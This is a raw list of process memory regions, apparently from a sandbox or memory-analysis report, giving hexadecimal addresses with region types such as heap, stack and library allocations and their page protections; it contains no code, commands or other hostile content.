1B662064000
heap
page read and write
7FFE7DA53000
trusted library allocation
page execute and read and write
7FFE7DC50000
trusted library allocation
page read and write
1B663FF2000
heap
page read and write
7FFE7DC90000
trusted library allocation
page read and write
867EBEF000
stack
page read and write
591855E000
stack
page read and write
237D51C4000
trusted library allocation
page read and write
1CD414D0000
heap
page read and write
1E073870000
heap
page read and write
1B664020000
heap
page read and write
246FF6B0000
heap
page read and write
6723F7E000
stack
page read and write
1A2A3451000
heap
page read and write
F4B548B000
stack
page read and write
672500E000
stack
page read and write
237D3D02000
trusted library allocation
page read and write
20ECD740000
heap
page read and write
1B66203A000
heap
page read and write
203C0BAB000
heap
page read and write
1832B5E0000
heap
page read and write
EDD427C000
stack
page read and write
7FF6C5768000
unkown
page readonly
237D4702000
trusted library allocation
page read and write
203C0E34000
heap
page read and write
1A29FE82000
heap
page read and write
7FFE7DAE0000
trusted library allocation
page read and write
20D3B930000
heap
page read and write
EDD42FF000
stack
page read and write
1A3C9370000
heap
page read and write
1CD42EA6000
heap
page read and write
893C5AF000
stack
page read and write
4282DCF000
stack
page read and write
1CD42EA6000
heap
page read and write
25DEFC77000
heap
page read and write
6724438000
stack
page read and write
672463B000
stack
page read and write
20ECD772000
heap
page read and write
CA2A56B000
stack
page read and write
1DDAA9EA000
trusted library allocation
page read and write
F0246FE000
stack
page read and write
291229C0000
heap
page read and write
203C0BB8000
heap
page read and write
218A3A50000
heap
page read and write
6723EFF000
stack
page read and write
1CD25179000
heap
page read and write
1B663F62000
heap
page read and write
1A29FD40000
heap
page read and write
1DD59A7D000
heap
page read and write
25DEFE34000
heap
page read and write
7FFE7DA32000
trusted library allocation
page read and write
20DC3020000
heap
page read and write
20DC2CEB000
heap
page read and write
203C0B40000
heap
page read and write
1A29FE3A000
heap
page read and write
237EBCA1000
heap
page read and write
1DDA74D4000
heap
page read and write
7FFE7DCA0000
trusted library allocation
page read and write
67242BE000
stack
page read and write
1A3CB562000
trusted library allocation
page read and write
1CD43485000
heap
page read and write
235C64B0000
heap
page read and write
253C9900000
heap
page read and write
1B66200D000
heap
page read and write
1A3DB341000
trusted library allocation
page read and write
2287ECCE000
heap
page read and write
7FFE7DC80000
trusted library allocation
page read and write
20ECD740000
heap
page read and write
28475750000
unkown
page read and write
1B662094000
heap
page read and write
2A15FB000
stack
page read and write
1A29FE49000
heap
page read and write
25DEFC8E000
heap
page read and write
7FFE7DBF0000
trusted library allocation
page execute and read and write
7FFE7DBE1000
trusted library allocation
page read and write
28475390000
unkown
page read and write
1DEE78D9000
heap
page read and write
7FFE7DAEC000
trusted library allocation
page execute and read and write
59184DB000
stack
page read and write
1B6622C4000
heap
page read and write
1DDC15C8000
heap
page read and write
7FFE7DD00000
trusted library allocation
page read and write
7FF703420000
unkown
page write copy
281C3F60000
heap
page read and write
218A3B26000
heap
page read and write
2AC61CA9000
heap
page read and write
1CD26FF0000
trusted library allocation
page read and write
1A29FE3B000
heap
page read and write
193BE030000
heap
page read and write
1CD4A285000
heap
page read and write
7FFE7DC12000
trusted library allocation
page read and write
7FFE7DD43000
trusted library allocation
page read and write
727FE7F000
stack
page read and write
1A2A0025000
heap
page read and write
1B6622CE000
heap
page read and write
1CD26EF4000
heap
page read and write
7FF75148B000
unkown
page write copy
7FF6C5700000
unkown
page readonly
67AEF7A000
stack
page read and write
7FFE7DC70000
trusted library allocation
page read and write
2287ECD1000
heap
page read and write
237D39E0000
heap
page execute and read and write
28477578000
unkown
page read and write
2295C420000
heap
page read and write
1CD42F2F000
heap
page read and write
672407D000
stack
page read and write
218A3B2E000
heap
page read and write
1B6620B5000
heap
page read and write
2AC61CC3000
heap
page read and write
1B6640A2000
heap
page read and write
7FFE7DCE0000
trusted library allocation
page read and write
7FF750E91000
unkown
page execute read
1A2A3450000
trusted library allocation
page read and write
2A07FF000
stack
page read and write
20DC2CEB000
heap
page read and write
1CD42F61000
direct allocation
page execute and read and write
218A3B1E000
heap
page read and write
1DD59A83000
heap
page read and write
1BA53160000
heap
page read and write
1B663EC0000
heap
page read and write
2D10DAE000
stack
page read and write
237D1D57000
heap
page read and write
49FDBAC000
stack
page read and write
1B6640E4000
heap
page read and write
1CD251A0000
heap
page read and write
1A3C93FB000
heap
page read and write
237EBD20000
heap
page execute and read and write
175F10C0000
heap
page read and write
1A3CCBC1000
trusted library allocation
page read and write
22FA3632000
heap
page read and write
7FF703420000
unkown
page read and write
237D1AF0000
heap
page read and write
20DC2CD6000
heap
page read and write
BACA7FE000
unkown
page readonly
4CCCD7F000
stack
page read and write
28476DB0000
unkown
page read and write
1B66201B000
heap
page read and write
544917E000
stack
page read and write
1CD251B0000
heap
page read and write
28475970000
unkown
page readonly
1DDA7429000
heap
page read and write
1CD25244000
heap
page read and write
20ECD75A000
heap
page read and write
1B664007000
heap
page read and write
1CD250F8000
heap
page read and write
2D121CE000
stack
page read and write
7FFE7DC60000
trusted library allocation
page read and write
1DD59C20000
heap
page read and write
237EBC21000
heap
page read and write
218A3B2D000
heap
page read and write
1B6667B3000
heap
page read and write
1FC3D5C0000
heap
page read and write
2FCB7C5000
stack
page read and write
1CD28750000
trusted library allocation
page read and write
193BE107000
heap
page read and write
1B6622C0000
heap
page read and write
1FC3D40D000
heap
page read and write
1A29FE52000
heap
page read and write
67AFE0E000
stack
page read and write
2295C624000
heap
page read and write
7FF703425000
unkown
page readonly
7FFE7DD10000
trusted library allocation
page read and write
7FFE7DB06000
trusted library allocation
page read and write
7FF75C2E8000
unkown
page readonly
253C7E40000
heap
page read and write
22FA3611000
heap
page read and write
92973FE000
stack
page read and write
284774B2000
unkown
page read and write
67AF27C000
stack
page read and write
2D11477000
stack
page read and write
1CD25120000
heap
page read and write
67241FD000
stack
page read and write
7FFE7DD30000
trusted library allocation
page read and write
20ECD738000
heap
page read and write
7FFE7DC12000
trusted library allocation
page read and write
1B666607000
heap
page read and write
1BA54B20000
heap
page read and write
25DEFBA0000
heap
page read and write
1CD25192000
heap
page read and write
7FF733291000
unkown
page execute read
1DDB91FA000
trusted library allocation
page read and write
7FFE7DD70000
trusted library allocation
page read and write
1F0AF5A5000
heap
page read and write
22FA3611000
heap
page read and write
67AF17E000
stack
page read and write
F02467B000
stack
page read and write
1A29FED3000
heap
page read and write
25B7AEC0000
heap
page read and write
1A3DB4E2000
trusted library allocation
page read and write
55240FE000
stack
page read and write
7FFE7DD20000
trusted library allocation
page read and write
253C7EDF000
heap
page read and write
160D0B9D000
heap
page read and write
7FFE7DC60000
trusted library allocation
page read and write
2096B7A8000
heap
page read and write
B17427F000
stack
page read and write
2287ECCE000
heap
page read and write
1A3CB300000
heap
page execute and read and write
1DDA9209000
trusted library allocation
page read and write
1B66200C000
heap
page read and write
7FF6C5700000
unkown
page readonly
7FFE7DD80000
trusted library allocation
page read and write
20ECD79C000
heap
page read and write
1FC3D764000
heap
page read and write
237D54CB000
trusted library allocation
page read and write
22FA35E0000
heap
page read and write
228B2878000
heap
page read and write
237D533C000
trusted library allocation
page read and write
1CD270FE000
heap
page read and write
1B6640A3000
heap
page read and write
218A3B32000
heap
page read and write
55241FB000
stack
page read and write
2AC61CBF000
heap
page read and write
1BA54B54000
heap
page read and write
1A29FE6E000
heap
page read and write
1FC3D5E0000
heap
page read and write
1DDC15A0000
heap
page read and write
2287ECA8000
heap
page read and write
237D35B0000
heap
page read and write
218A3B0C000
heap
page read and write
246FFAB0000
heap
page read and write
7FF7033FE000
unkown
page readonly
237D1CE7000
heap
page read and write
1B662033000
heap
page read and write
237D1CA0000
heap
page read and write
7FF75C2A0000
unkown
page readonly
1B663FE5000
heap
page read and write
1DDC1320000
heap
page execute and read and write
1D21D0C000
stack
page read and write
6D04F7F000
stack
page read and write
1DDA9150000
heap
page execute and read and write
CA2A87E000
stack
page read and write
160D0B91000
heap
page read and write
1A29FE6E000
heap
page read and write
1CD43130000
heap
page read and write
1DD59A67000
heap
page read and write
237D1F40000
heap
page read and write
281C5B40000
heap
page read and write
1CD42EA2000
heap
page read and write
228B41C0000
heap
page read and write
1DD59CD4000
heap
page read and write
3D03715000
stack
page read and write
1DDC15E8000
heap
page read and write
7FFE7DA3D000
trusted library allocation
page execute and read and write
1A3CADC0000
heap
page readonly
2287EEA0000
heap
page read and write
7FFE7DCA0000
trusted library allocation
page read and write
237D50C0000
trusted library allocation
page read and write
22FA362C000
heap
page read and write
67252CE000
stack
page read and write
7FFE7DC60000
trusted library allocation
page read and write
1A29FDF0000
heap
page read and write
BACA4A7000
unkown
page read and write
284753F0000
heap
page read and write
2FCC0FF000
stack
page read and write
28476E00000
heap
page read and write
203C0B88000
heap
page read and write
1F0AF5CF000
heap
page read and write
7FFE7DD20000
trusted library allocation
page read and write
1B6656AB000
heap
page read and write
15ED1D74000
heap
page read and write
22FA37D0000
heap
page read and write
29122ABB000
heap
page read and write
7FFE7DCB6000
trusted library allocation
page read and write
1FC3D3F7000
heap
page read and write
F6BD4FB000
stack
page read and write
7FFE7DCC0000
trusted library allocation
page read and write
1B66671F000
heap
page read and write
3D0370E000
stack
page read and write
2D1230E000
stack
page read and write
7FF75C308000
unkown
page readonly
22FA3617000
heap
page read and write
90B81FF000
stack
page read and write
1CD48E85000
heap
page read and write
1B663F10000
heap
page read and write
20DC2CF3000
heap
page read and write
22FA3605000
heap
page read and write
1A3E3600000
heap
page execute and read and write
2287EC40000
heap
page read and write
29122AA8000
heap
page read and write
20ECD73C000
heap
page read and write
7FFE7DAF0000
trusted library allocation
page execute and read and write
1F0AF5D0000
heap
page read and write
1FC3D40D000
heap
page read and write
6D04FFF000
stack
page read and write
1DDA90A0000
trusted library allocation
page read and write
1B666711000
heap
page read and write
54492FE000
stack
page read and write
7DF4E62B0000
trusted library allocation
page execute and read and write
1B663FE9000
heap
page read and write
235C62C0000
heap
page read and write
727FBCF000
stack
page read and write
67AFC4E000
stack
page read and write
1FC3D3F5000
heap
page read and write
291228A0000
heap
page read and write
25B7CAD0000
heap
page read and write
28D558B000
stack
page read and write
DA916FF000
stack
page read and write
1A3E3380000
heap
page read and write
1DD59A7D000
heap
page read and write
25DEFC8C000
heap
page read and write
2D111FC000
stack
page read and write
7FFE7DC20000
trusted library allocation
page execute and read and write
7FFE7DB16000
trusted library allocation
page execute and read and write
28477376000
unkown
page read and write
1DD59A56000
heap
page read and write
7FF75C2E8000
unkown
page readonly
1DDB9181000
trusted library allocation
page read and write
1DDA9170000
heap
page read and write
1DD59A81000
heap
page read and write
1CD250E4000
heap
page read and write
29122ABB000
heap
page read and write
160D0B89000
heap
page read and write
160D0B76000
heap
page read and write
1A2A1CFB000
heap
page read and write
5523EFD000
stack
page read and write
1F0AF5AB000
heap
page read and write
1A3CB1A2000
heap
page read and write
2A0DFF000
stack
page read and write
253C8054000
heap
page read and write
7FFE7DD50000
trusted library allocation
page read and write
1CD25193000
heap
page read and write
1DD59A7E000
heap
page read and write
1CD250FC000
heap
page read and write
7FFE7DBEA000
trusted library allocation
page read and write
237D545E000
trusted library allocation
page read and write
7FF703380000
unkown
page readonly
291229B4000
heap
page read and write
1E073650000
heap
page read and write
1A29FE43000
heap
page read and write
15542BAB000
heap
page read and write
4CCCC7F000
stack
page read and write
1B663D8A000
trusted library allocation
page read and write
7FFE7DD00000
trusted library allocation
page read and write
7FF75C30D000
unkown
page readonly
1DEE78A7000
heap
page read and write
1CD25240000
heap
page read and write
28476D90000
unkown
page readonly
2287ECB9000
heap
page read and write
20ECD79C000
heap
page read and write
1DDA7520000
trusted library allocation
page read and write
28475760000
heap
page read and write
2295DF40000
heap
page read and write
1B66670C000
heap
page read and write
7FFE7DCB0000
trusted library allocation
page read and write
1FC3D41A000
heap
page read and write
1FC3D407000
heap
page read and write
2D1167E000
stack
page read and write
7FFE7DBE1000
trusted library allocation
page read and write
29122A96000
heap
page read and write
1A29FE8B000
heap
page read and write
67AEFF8000
stack
page read and write
7FF733290000
unkown
page readonly
203C0BCE000
heap
page read and write
1DDAADBD000
trusted library allocation
page read and write
1CD42F1F000
heap
page read and write
1A3CAE54000
heap
page read and write
1CD250FB000
heap
page read and write
7FFE7DCC0000
trusted library allocation
page read and write
F4B58FF000
stack
page read and write
7FFE7DD80000
trusted library allocation
page read and write
1A2A3D57000
heap
page read and write
20ECD740000
heap
page read and write
1FC3D408000
heap
page read and write
5523FFE000
stack
page read and write
203C0BAB000
heap
page read and write
25B7ADE0000
heap
page read and write
1A29FE43000
heap
page read and write
7FF6C576D000
unkown
page readonly
1A2A1EC3000
heap
page read and write
7FF6C5701000
unkown
page execute read
2AC61CC0000
heap
page read and write
7FFE7DC80000
trusted library allocation
page read and write
25B7B175000
heap
page read and write
1B66206B000
heap
page read and write
92979FE000
stack
page read and write
218A3CA4000
heap
page read and write
1A29FDC4000
heap
page read and write
25B7B170000
heap
page read and write
1CD25112000
heap
page read and write
67AFE8D000
stack
page read and write
1CD25176000
heap
page read and write
67AED7E000
stack
page read and write
175F1108000
heap
page read and write
1CD251A0000
heap
page read and write
237D1C60000
heap
page read and write
B6942FF000
stack
page read and write
7FF7332EB000
unkown
page read and write
1CD42F50000
direct allocation
page execute and read and write
2FCB7C0000
stack
page read and write
1B66672A000
heap
page read and write
20D3BAE0000
heap
page read and write
20DC2CC5000
heap
page read and write
235C63FE000
heap
page read and write
3D03DFD000
stack
page read and write
67AEA7E000
stack
page read and write
15ED19D6000
heap
page read and write
1B662005000
heap
page read and write
5A9F0FF000
stack
page read and write
20ECD640000
heap
page read and write
2287ECAD000
heap
page read and write
20DC2CA7000
heap
page read and write
7FF7332F8000
unkown
page readonly
1B662033000
heap
page read and write
20DC2CB7000
heap
page read and write
2287ECC2000
heap
page read and write
1A2A1EC3000
heap
page read and write
1E07375E000
heap
page read and write
20D3BAE8000
heap
page read and write
1DDA9181000
trusted library allocation
page read and write
281C4010000
heap
page read and write
15ED1D70000
heap
page read and write
1CD26F0C000
heap
page read and write
22FA3605000
heap
page read and write
67AEBFE000
stack
page read and write
203C0BCC000
heap
page read and write
7FFE7DD30000
trusted library allocation
page read and write
7FFE7DC00000
trusted library allocation
page execute and read and write
1CD24F90000
heap
page read and write
7FFE7DC01000
trusted library allocation
page read and write
1CD26ED0000
heap
page read and write
1FC3D3D0000
heap
page read and write
246FF690000
heap
page read and write
F95BB7B000
stack
page read and write
220ECAC000
stack
page read and write
1CD250FE000
heap
page read and write
1CD47A85000
heap
page read and write
1A29FD10000
heap
page readonly
1B663F2D000
heap
page read and write
22FA360B000
heap
page read and write
7FFE7DD60000
trusted library allocation
page read and write
7FFE7DAEC000
trusted library allocation
page execute and read and write
1B663FF2000
heap
page read and write
2287ECD4000
heap
page read and write
2AC61E90000
heap
page read and write
1A3CB320000
heap
page read and write
1DD59CD0000
heap
page read and write
9297AFF000
stack
page read and write
1B662025000
heap
page read and write
1CD48485000
heap
page read and write
1A3C9390000
heap
page read and write
1DDA7584000
heap
page read and write
1A3CADB0000
trusted library allocation
page read and write
1CD42F40000
direct allocation
page execute and read and write
1A3CCF69000
trusted library allocation
page read and write
1CD2524E000
heap
page read and write
237D1CAC000
heap
page read and write
54D00FE000
stack
page read and write
25DEFC40000
heap
page read and write
7FF703425000
unkown
page readonly
F95BBFF000
stack
page read and write
203C0BCC000
heap
page read and write
1B666723000
heap
page read and write
7FF75C2A1000
unkown
page execute read
2287ECD0000
heap
page read and write
22FA35E8000
heap
page read and write
54D09FF000
stack
page read and write
203C0BA6000
heap
page read and write
237D1BF0000
heap
page read and write
92972FF000
stack
page read and write
22FA3631000
heap
page read and write
1A3C93B0000
heap
page read and write
29FBFA000
stack
page read and write
1B6620A5000
heap
page read and write
1DDAACF3000
trusted library allocation
page read and write
218A3B26000
heap
page read and write
7FFE7DD50000
trusted library allocation
page read and write
2FCBBFE000
stack
page read and write
1A2A3D5B000
heap
page read and write
2A13FE000
stack
page read and write
2D1127E000
stack
page read and write
2AC61E94000
heap
page read and write
1CD25123000
heap
page read and write
1832B624000
heap
page read and write
6D04EFC000
stack
page read and write
1B662021000
heap
page read and write
3D040FE000
stack
page read and write
7FFE7DC20000
trusted library allocation
page execute and read and write
FD8B7FF000
stack
page read and write
1B662029000
heap
page read and write
67AF07E000
stack
page read and write
20ECD731000
heap
page read and write
2D11579000
stack
page read and write
2D112FE000
stack
page read and write
237D35B6000
heap
page read and write
1E0751E0000
heap
page read and write
1F0AF588000
heap
page read and write
90B7D6E000
stack
page read and write
237EBE69000
heap
page read and write
15ED19B0000
heap
page read and write
22FA362C000
heap
page read and write
28477444000
unkown
page read and write
20DC3024000
heap
page read and write
237D570D000
trusted library allocation
page read and write
1F0AF5CE000
heap
page read and write
237EBCC0000
heap
page read and write
1DD59A5B000
heap
page read and write
1A3E33F3000
heap
page read and write
1CD45285000
heap
page read and write
CA2A9FE000
stack
page read and write
29FDFF000
stack
page read and write
7FFE7DD40000
trusted library allocation
page read and write
20D3BAEB000
heap
page read and write
7FFE7DB16000
trusted library allocation
page execute and read and write
1A29FDEA000
trusted library allocation
page read and write
F4B558F000
stack
page read and write
1DDC138E000
heap
page read and write
7FFE7DA4B000
trusted library allocation
page read and write
20DC2CCB000
heap
page read and write
1A3CC914000
trusted library allocation
page read and write
F6BD2FE000
stack
page read and write
237EBD50000
heap
page read and write
160D0B9D000
heap
page read and write
7FFE7DD70000
trusted library allocation
page read and write
B505AFE000
stack
page read and write
203C0BBE000
heap
page read and write
284753F8000
heap
page read and write
1A29FED2000
heap
page read and write
160D0B7B000
heap
page read and write
7FFE7DA4B000
trusted library allocation
page read and write
1A2A1CFE000
heap
page read and write
1A3CCA3B000
trusted library allocation
page read and write
2096B7A0000
heap
page read and write
253C7EAD000
heap
page read and write
1832B41B000
heap
page read and write
1DDA7550000
heap
page readonly
7FFE7DC70000
trusted library allocation
page read and write
DA9167B000
stack
page read and write
20ECD79C000
heap
page read and write
1CD42E9E000
heap
page read and write
25DEFC8C000
heap
page read and write
235C63B0000
heap
page read and write
218A3B2D000
heap
page read and write
1FC3D41A000
heap
page read and write
49FDEFF000
stack
page read and write
1A2A3C50000
heap
page read and write
1A29FC30000
heap
page read and write
1CD42E9E000
heap
page read and write
1DDC1334000
heap
page read and write
1DDA7400000
heap
page read and write
7FFE7DAE0000
trusted library allocation
page read and write
F6BCBFE000
stack
page read and write
1CD42F27000
heap
page read and write
1A3DB331000
trusted library allocation
page read and write
20ECDA00000
heap
page read and write
7FF75C2FB000
unkown
page write copy
4AD771C000
stack
page read and write
22FA360B000
heap
page read and write
1FC3D41A000
heap
page read and write
7FFE7DCF0000
trusted library allocation
page read and write
7FFE7DCE0000
trusted library allocation
page read and write
218A3B20000
heap
page read and write
20ECD734000
heap
page read and write
160D0B91000
heap
page read and write
7FFE7DC10000
trusted library allocation
page execute and read and write
2295C620000
heap
page read and write
2D115FE000
stack
page read and write
1F0AF5B9000
heap
page read and write
4AD7A7F000
stack
page read and write
20ECD73D000
heap
page read and write
2287ECBB000
heap
page read and write
1DD59A82000
heap
page read and write
92978FD000
stack
page read and write
1B664061000
heap
page read and write
1A3E3829000
heap
page read and write
2295C4E7000
heap
page read and write
7FFE7DC30000
trusted library allocation
page read and write
7FFE7DAE6000
trusted library allocation
page read and write
1CD26FF0000
heap
page read and write
20DC2CEF000
heap
page read and write
20ECD782000
heap
page read and write
1B6620CD000
heap
page read and write
2847757C000
unkown
page read and write
1F0AF5D2000
heap
page read and write
1FC3D3FC000
heap
page read and write
1DDC1356000
heap
page read and write
15542D90000
heap
page read and write
1A2A1E00000
heap
page read and write
67AF0FE000
stack
page read and write
B5058F7000
stack
page read and write
B5057FF000
stack
page read and write
246FF73B000
heap
page read and write
1B6620A6000
heap
page read and write
7FFE7DC90000
trusted library allocation
page read and write
1DDAAA16000
trusted library allocation
page read and write
1DDC1330000
heap
page read and write
7FF751986000
unkown
page readonly
2287ECD5000
heap
page read and write
1DDAADB9000
trusted library allocation
page read and write
160D0B10000
heap
page read and write
1DDA74D6000
heap
page read and write
2847753B000
unkown
page read and write
7FFE7DC00000
trusted library allocation
page execute and read and write
2AC61CA8000
heap
page read and write
1A29FDF8000
heap
page read and write
54491FE000
stack
page read and write
193BE390000
heap
page read and write
1FC3D41C000
heap
page read and write
1BA53250000
heap
page read and write
237D3B59000
trusted library allocation
page read and write
29122980000
heap
page read and write
1DEE77D0000
heap
page read and write
1B662048000
heap
page read and write
237D53AF000
trusted library allocation
page read and write
15ED19D0000
heap
page read and write
1CD47085000
heap
page read and write
1A3C93CF000
heap
page read and write
203C0BB9000
heap
page read and write
B173FCC000
stack
page read and write
237E3B4B000
trusted library allocation
page read and write
237D5647000
trusted library allocation
page read and write
29122A9C000
heap
page read and write
1B663FA3000
heap
page read and write
1A3CBF62000
trusted library allocation
page read and write
2D1228F000
stack
page read and write
237D1F00000
trusted library allocation
page read and write
5523785000
stack
page read and write
29122AA6000
heap
page read and write
67245BC000
stack
page read and write
67251CE000
stack
page read and write
1DDA73DF000
heap
page read and write
2A0FFE000
stack
page read and write
7FFE7DCB0000
trusted library allocation
page read and write
193BE394000
heap
page read and write
237EBCC8000
heap
page read and write
7FFE7DC70000
trusted library allocation
page read and write
235C6690000
heap
page read and write
1DDAA78B000
trusted library allocation
page read and write
1DD59A30000
heap
page read and write
22FA362C000
heap
page read and write
1A2B4EF0000
heap
page read and write
6724279000
stack
page read and write
237EBE70000
heap
page read and write
220EDAF000
stack
page read and write
1B664021000
heap
page read and write
67243BA000
stack
page read and write
1CD42EA6000
heap
page read and write
67AF1FC000
stack
page read and write
1A3E383C000
heap
page read and write
2FCBEFD000
stack
page read and write
2D10D23000
stack
page read and write
1B662033000
heap
page read and write
237D1CAA000
heap
page read and write
160D0BA2000
heap
page read and write
7FF6C5748000
unkown
page readonly
218A3B2D000
heap
page read and write
25DEFC6B000
heap
page read and write
1DEE91F0000
heap
page read and write
1A3CB2D7000
heap
page execute and read and write
203C0D50000
heap
page read and write
237D1F44000
heap
page read and write
1A3CAE56000
heap
page read and write
3D03EFE000
stack
page read and write
7FFE7DD40000
trusted library allocation
page read and write
1DDA7540000
trusted library allocation
page read and write
544927E000
stack
page read and write
2D1214E000
stack
page read and write
237D3AD1000
trusted library allocation
page read and write
1B666717000
heap
page read and write
1B663D60000
heap
page read and write
7FF750E90000
unkown
page readonly
237EBE30000
heap
page read and write
1A3E3810000
heap
page read and write
29122ABB000
heap
page read and write
20DC2CEF000
heap
page read and write
2AC61BB0000
heap
page read and write
235C63FF000
heap
page read and write
1A2B5040000
heap
page read and write
1A29FD20000
heap
page read and write
CA2A5EE000
stack
page read and write
1A2A1CF0000
trusted library allocation
page read and write
1A2A3D5A000
heap
page read and write
25B7AEE0000
heap
page read and write
20ECD7B5000
heap
page read and write
237D3933000
trusted library allocation
page read and write
7FFE7DC20000
trusted library allocation
page execute and read and write
25B7AF98000
heap
page read and write
FD8B6FC000
stack
page read and write
7FFE7DA32000
trusted library allocation
page read and write
1CD42EA2000
heap
page read and write
235C63D7000
heap
page read and write
1CD25175000
heap
page read and write
1F0AF4F0000
heap
page read and write
218A3B1A000
heap
page read and write
25DEFE30000
heap
page read and write
1B6656AF000
heap
page read and write
CDE1F3C000
stack
page read and write
235C63DC000
heap
page read and write
1CD27291000
heap
page read and write
237EBD27000
heap
page execute and read and write
5A9ED7F000
stack
page read and write
2D110FE000
stack
page read and write
1CD25162000
heap
page read and write
7FFE7DDA0000
trusted library allocation
page read and write
20ECD782000
heap
page read and write
7FF75C2A1000
unkown
page execute read
1B663FE3000
heap
page read and write
1B662029000
heap
page read and write
1CD28759000
heap
page read and write
28D597E000
stack
page read and write
1CD25118000
heap
page read and write
1A29FE42000
heap
page read and write
7FF703381000
unkown
page execute read
E02287F000
stack
page read and write
1B663FF6000
heap
page read and write
7FFE7DA6B000
trusted library allocation
page read and write
B505CFB000
stack
page read and write
235C6694000
heap
page read and write
1F7F81C8000
heap
page read and write
20ECD720000
heap
page read and write
2AC61CC1000
heap
page read and write
28477450000
unkown
page read and write
BACA4A9000
unkown
page read and write
22FA37F0000
heap
page read and write
67AFD8E000
stack
page read and write
B5053FF000
stack
page read and write
23ABEFF000
stack
page read and write
1A29FE49000
heap
page read and write
193BDF50000
heap
page read and write
2287ECD3000
heap
page read and write
218A3B07000
heap
page read and write
54D04FE000
stack
page read and write
1FC3D3F6000
heap
page read and write
25B7AF90000
heap
page read and write
90B7DEE000
stack
page read and write
1FC3D41A000
heap
page read and write
7FFE7DBF0000
trusted library allocation
page execute and read and write
203C0B50000
heap
page read and write
160D0B59000
heap
page read and write
246FF737000
heap
page read and write
237D1F20000
trusted library allocation
page read and write
20ECD73D000
heap
page read and write
2295C4EE000
heap
page read and write
284774F4000
unkown
page read and write
1B664062000
heap
page read and write
2D1177B000
stack
page read and write
DA918FE000
stack
page read and write
1A3C9494000
heap
page read and write
160D0E20000
heap
page read and write
672514F000
stack
page read and write
F6BCFFF000
stack
page read and write
218A3B31000
heap
page read and write
1CD25193000
heap
page read and write
218A3B26000
heap
page read and write
B505BFE000
stack
page read and write
F6BCEFE000
stack
page read and write
1F7F8110000
heap
page read and write
1DDA90A3000
trusted library allocation
page read and write
237D54C9000
trusted library allocation
page read and write
28475380000
heap
page read and write
1A2A1F0C000
heap
page read and write
7FFE7DA5D000
trusted library allocation
page execute and read and write
2AC61CBF000
heap
page read and write
2D1117E000
stack
page read and write
7FFE7DA40000
trusted library allocation
page read and write
54CFD1A000
stack
page read and write
B1742FF000
stack
page read and write
15542DB0000
heap
page read and write
22FA3632000
heap
page read and write
1DEE7800000
heap
page read and write
67AE7FF000
stack
page read and write
1F0AF4C0000
heap
page read and write
2096D110000
heap
page read and write
20ECD76A000
heap
page read and write
5523BFD000
stack
page read and write
20ECD73D000
heap
page read and write
7FFE7DD70000
trusted library allocation
page read and write
1DEE7870000
heap
page read and write
2287EC10000
heap
page read and write
2D114FA000
stack
page read and write
1B663D64000
heap
page read and write
1A29FDC0000
heap
page read and write
727FB4B000
stack
page read and write
591897F000
stack
page read and write
1E0737A6000
heap
page read and write
22FA3606000
heap
page read and write
1CD45C85000
heap
page read and write
237EBAD5000
heap
page read and write
1A3CB331000
trusted library allocation
page read and write
2287ECA7000
heap
page read and write
237D525C000
trusted library allocation
page read and write
1B663FE3000
heap
page read and write
CA2AA7F000
stack
page read and write
1DDA7427000
heap
page read and write
25DEFC79000
heap
page read and write
29122ABC000
heap
page read and write
29122A96000
heap
page read and write
CDE1FBF000
stack
page read and write
29122A9C000
heap
page read and write
3D03BFF000
stack
page read and write
1A2A1CE0000
heap
page read and write
284772B2000
unkown
page read and write
1DDA7560000
trusted library allocation
page read and write
92975FE000
stack
page read and write
1A3E3520000
heap
page read and write
1A3C943B000
heap
page read and write
1CD42F07000
heap
page read and write
1DDA7580000
heap
page read and write
237EBC8F000
heap
page read and write
1A2A1C10000
heap
page read and write
20ECD75A000
heap
page read and write
1A3CAD90000
trusted library allocation
page read and write
15542BA0000
heap
page read and write
1A3C93F7000
heap
page read and write
237D1CA4000
heap
page read and write
1CD25195000
heap
page read and write
1A29FED3000
heap
page read and write
3D03FF8000
stack
page read and write
2AC61B90000
heap
page read and write
1A29FE27000
heap
page read and write
20ECD7B5000
heap
page read and write
1A3CC972000
trusted library allocation
page read and write
7FFE7DD40000
trusted library allocation
page read and write
1CD49885000
heap
page read and write
2287ECAD000
heap
page read and write
1DD59B40000
heap
page read and write
237D3AC0000
heap
page read and write
23AC1FE000
stack
page read and write
1A29FE52000
heap
page read and write
1F0AF5A5000
heap
page read and write
7FFE7DC32000
trusted library allocation
page read and write
1E07375A000
heap
page read and write
90B7CEB000
stack
page read and write
5A9ECFB000
stack
page read and write
67AEE79000
stack
page read and write
1A2A1EC3000
heap
page read and write
237D1BD0000
heap
page read and write
25DEFC48000
heap
page read and write
90B807F000
stack
page read and write
1DD59A7D000
heap
page read and write
67AFD4D000
stack
page read and write
1CD42F71000
direct allocation
page execute and read and write
1A29FDD1000
trusted library allocation
page read and write
237EBC66000
heap
page read and write
1CD250B8000
heap
page read and write
15542F54000
heap
page read and write
7FFE7DC80000
trusted library allocation
page read and write
7FFE7DC65000
trusted library allocation
page read and write
20DC2CD7000
heap
page read and write
1B6620B5000
heap
page read and write
1DDC1980000
heap
page read and write
20ECD560000
heap
page read and write
1B6620B5000
heap
page read and write
1D2207E000
stack
page read and write
1B664003000
heap
page read and write
672453E000
stack
page read and write
160D0B9D000
heap
page read and write
20DC2CF3000
heap
page read and write
BACA4A3000
unkown
page read and write
5523789000
stack
page read and write
1A3C93EF000
heap
page read and write
1DD59A7F000
heap
page read and write
1B662084000
heap
page read and write
20DC2CF3000
heap
page read and write
20D3BA10000
heap
page read and write
2D1238D000
stack
page read and write
235C6400000
heap
page read and write
237D1F30000
heap
page readonly
1A29FE66000
heap
page read and write
1DDA73A0000
heap
page read and write
2AC61CBF000
heap
page read and write
20ECD75A000
heap
page read and write
22FA3950000
heap
page read and write
237EBBE0000
heap
page read and write
246FF730000
heap
page read and write
218A3B06000
heap
page read and write
1CD250B0000
heap
page read and write
1CD25180000
heap
page read and write
CA2A97F000
stack
page read and write
1DD59A55000
heap
page read and write
1A29FEAF000
heap
page read and write
20ECDA04000
heap
page read and write
7FFE7DD60000
trusted library allocation
page read and write
1A29FE88000
heap
page read and write
20DC2CA0000
heap
page read and write
237EBD30000
heap
page read and write
237D1CED000
heap
page read and write
1B663FE3000
heap
page read and write
203C0B80000
heap
page read and write
1DDC14C0000
heap
page read and write
867EE7F000
stack
page read and write
1CD43E85000
heap
page read and write
1832B3E0000
heap
page read and write
7FF75148E000
unkown
page write copy
218A3AE8000
heap
page read and write
253C8050000
heap
page read and write
7FF7332F2000
unkown
page read and write
1DDA73E4000
heap
page read and write
237E3AD1000
trusted library allocation
page read and write
1A3CCB96000
trusted library allocation
page read and write
